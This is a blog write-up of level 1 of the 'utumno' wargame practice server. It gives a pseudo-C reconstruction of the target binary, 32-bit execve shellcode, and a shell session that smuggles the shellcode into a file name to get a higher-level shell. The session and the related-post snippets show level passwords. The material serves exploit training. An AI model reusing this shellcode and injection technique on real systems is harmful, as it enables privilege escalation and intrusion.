utumno - 1

最新推荐文章于 2017-09-11 17:50:34 发布
最新推荐文章于 2017-09-11 17:50:34 发布
阅读量687 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: wargames wargames-writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/shuimuyq/article/details/51082810 
/* utumno1.c */

#include <stdio.h>
#include <stdlib.h>

/** stack environment of main
 *	env
 *	argv
 *	argc
 *	eip
 *	ebp
 *	align
 *	stack of main
 */

/** stack environment of run
 *	filename + 3
 *		<== ebp + 0x08
 *	eip
 *		<== ebp + 0x04
 *	ebp		
 *		<== ebp 
 *	xxx		
 *		<== ebp - 0x04
 */
void run(char *filename)
{
	push   %ebp           
	mov    %esp,%ebp      
	sub    $0x10,%esp     
	lea    -0x4(%ebp),%eax
	add    $0x8,%eax      
	mov    %eax,-0x4(%ebp)
	mov    -0x4(%ebp),%eax
	mov    0x8(%ebp),%edx 
	mov    %edx,(%eax)    
	leave                 
	ret  	
}

int main(int argc, char *argv[])
{
	if (argv[1] == NULL)
		exit(1);

	DIR dirp = opendir(argv[1]);
	if (dirp == NULL)
		exit(1);

	struct dirent *direntp;
	while ((direntp = readdir(dirp)) != NULL) {
		if (strncmp("sh_", direntp->name, 3) == NULL) {
			run(direntp->name + 3);
		}
	}
}


shellcode.asm

; nasm -f elf64 shellcode.asm -g -F stabs -o shellcode.o
; for i in $(objdump -d shellcode.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo
;

BITS 32

global _start
section .text

; syscalls kernel
SYS_EXECVE equ 0x0b

_start:
	; ln -sf /bin/sh UUUU
	; execve("UUUU", 0, 0); 
	push SYS_EXECVE ; SYS_EXECVE = 11
	pop eax         ; set SYS_EXECVE to eax

	xor esi, esi    ; clean esi
	push esi        ; esi is zero
	push 0x55555555 ; push 'UUUU'

	; execve("UUUU", 0, 0);
	;             ^
	;             |
	;            ebx
	mov ebx, esp

	; execve("UUUU", 0, 0);
	;                     ^
	;                     |
	;                    ecx
	xor ecx, ecx    ; clean ecx

	; execve("UUUU", 0, 0);
	;                        ^
	;                        |
	;                       edx
	mov edx, ecx    ; set zero to edx
	int 0x80        ; syscall execve

root@today:~/Desktop/misc/utumno/utumno1# ssh utumno1@178.79.134.250

utumno1@178.79.134.250's password: aathaeyiew

utumno1@melinda:~$ cd /tmp

utumno1@melinda:/tmp$ mkdir utu1

utumno1@melinda:/tmp$ cd utu1

utumno1@melinda:/tmp/utu1$ mkdir dir

utumno1@melinda:/tmp/utu1$ ls
dir

utumno1@melinda:/tmp/utu1$ cd dir

utumno1@melinda:/tmp/utu1/dir$ touch `python -c 'print "sh_\x6a\x0b\x58\x31\xf6\x56\x68\x55\x55\x55\x55\x89\xe3\x31\xc9\x89\xca\xcd\x80"'`

utumno1@melinda:/tmp/utu1/dir$ cd ..

utumno1@melinda:/tmp/utu1$ ln -sf /bin/sh UUUU

utumno1@melinda:/tmp/utu1$ /utumno/utumno1 dir
$ whoami
utumno2
$ cat /etc/utumno_pass/utumno2
ceewaceiph
$



utumno - 0
shuimuyq的专栏
04-07 1400
因为utumno0不可读, 开始以为用strace可以获取一些信息 最后只是调用write,并没什么用(从这里可以知道库函数puts最后是调用write来实现的) 最后利用xocopy把可执行代码dump出来 gcc xocopy.c -o xocopy -m32 ./xocopy /utumno/utumno0 ./xocopy -a 0x08049000 /utumno/utumno
170909 WarGames-Utumno(0-1
whklhhhh的博客
09-09 551
1625-5 王子昂 总结《2017年9月9日》 【连续第341天总结】 A. WarGames-utumno B.Level 0执行提示“Readme :p” 刚开始还没懂什么意思,习惯性想down到本地IDA 发现SFTP和SSH都没法把文件下载到本地才反应过来,文件只有可执行权限查了一波,发现可以用xocopy工具将内存中的程序dump下来 http://reverse.lostr
utumno - 3
shuimuyq的专栏
04-08 724
┌──────────────────────────────────────────────────────────┐esp+0x38 chr │0x80483fd push %ebp │esp+0x3c cnt │0x80483fe mov %esp,%ebp │es
utumno - 7
shuimuyq的专栏
04-13 823
root@today:~/Desktop/misc/utumno/utumno6# ssh utumno7@178.79.134.250 utumno7@178.79.134.250's password: totiquegae utumno7@melinda:~$ mkdir /tmp/utu7 utumno7@melinda:~$ cd /tmp/utu7 utumno7@melind
utumno - 2
shuimuyq的专栏
04-07 539
root@today:~# ssh utumno2@178.79.134.250 utumno2@178.79.134.250's password: ceewaceiph utumno2@melinda:~$ cd /tmp utumno2@melinda:/tmp$ mkdir utu2 utumno2@melinda:/tmp$ cd utu2 utumno2@melinda:
utumno - 4
shuimuyq的专栏
04-13 716
root@today:~/Desktop/misc/utumno/utumno4# ssh utumno4@178.79.134.250 utumno4@melinda:~$ cd /tmp/utu4 utumno4@melinda:/tmp/utu4$ gdb -tui /utumno/utumno4 (gdb) layout asm (gdb) b *main+108 Breakpoint
utumno - 5
shuimuyq的专栏
04-13 701
root@today:~/Desktop/misc/utumno/utumno5# ssh utumno5@178.79.134.250 utumno5@178.79.134.250's password: woucaejiek utumno5@melinda:~$ mkdir /tmp/utu5 utumno5@melinda:~$ cd /tmp/utu5 utumno5@melind
utumno - 6
shuimuyq的专栏
04-13 1287
root@today:~/Desktop/misc/utumno/utumno6# ssh utumno6@178.79.134.250 utumno6@178.79.134.250's password: eiluquieth utumno6@melinda:~$ mkdir /tmp/utu6 utumno6@melinda:~$ cd /tmp/utu6 utumno6@melind
170911 WarGames-Utumno(3)
whklhhhh的博客
09-11 394
1625-5 王子昂 总结《2017年9月10日》 【连续第342天总结】 A. WarGames-utumno B.Level 3int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // ebx@2 int v5; // [sp+8h] [bp-3Ch]@2 int v6; //
narnia6
shuimuyq的专栏
02-17 690
/** narnia6.c */ /* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundatio
behemoth - 07
shuimuyq的专栏
02-23 627
#include #include #include #include extern char **environ; int main(int argc, char *argv[]) { char *argv1 = argv[1]; /* 0x21c */ int envcnt; /* 0x218 */ int slen; /* 0x214 */ char buf[512]
narnia1
shuimuyq的专栏
02-16 599
/** narnia1.c */ /* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundatio
behemoth - 01
shuimuyq的专栏
02-23 547
#include int main(int argc, char *argv[]) { char buf[64]; printf("Password: "); gets(buf); puts("Authentication failure.\nSorry."); return 0; } root@today:~# ssh behemoth1@178.79.1
narnia2
shuimuyq的专栏
02-16 543
/** narnia2.c */ /* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundatio
narnia8
shuimuyq的专栏
02-16 525
/** narnia8.c */ /* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundatio
narnia7
shuimuyq的专栏
02-16 498
/** narnia7.c */ /* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundatio
永磁同步电机参数辨识MATLAB仿真
08-14
1.模型版本 本仿真模型基于MATLAB/Simulink(版本MATLAB 2014Rb)软件。建议采用MATLAB 2014Rb及以上版本打开。 2.模型介绍: 永磁同步电机参数辨识仿真,基于递推最小二乘法RLS的永磁同步电机参数辨识,仿真程序加解析文档及参考文献。
自动驾驶算法仿真测试:感知-决策-控制模块的功能优化与实车开发提速
08-14
自动驾驶算法在仿真环境中的测试情况,重点探讨了感知、决策和控制三个关键模块的功能验证及其对实际车辆开发的影响。文中列举了多个具体测试场景,如大曲率弯道行驶、障碍物绕行、拥挤路段通行、交通灯减速停车以及施工路段绕行等,展示了不同条件下算法的表现,并提供了部分代码片段来解释特定功能的工作机制。此外,文章还提到了一些特殊情况下(如紧急制动)的数据表现,强调了仿真测试对于提高算法稳定性和安全性的重要意义。 适用人群:从事自动驾驶技术研发的专业人士,尤其是关注算法优化和实车应用的技术人员。 使用场景及目标:适用于希望深入了解自动驾驶系统内部运作机制的研究者和技术开发者;旨在帮助相关人员更好地理解和改进自动驾驶算法,从而加快产品化进程并确保更高的安全标准。 其他说明:文中提到的某些参数设置和代码实现细节可以作为参考,但需要注意实际部署时还需考虑更多因素。同时,尽管仿真环境中能够模拟多种复杂路况,最终仍需结合实地测试进行综合评估。
(236页PPT)埃森哲企业数字化转型端到端顶层规划方案.pptx
最新发布
08-14
(236页PPT)埃森哲企业数字化转型端到端顶层规划方案.pptx
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值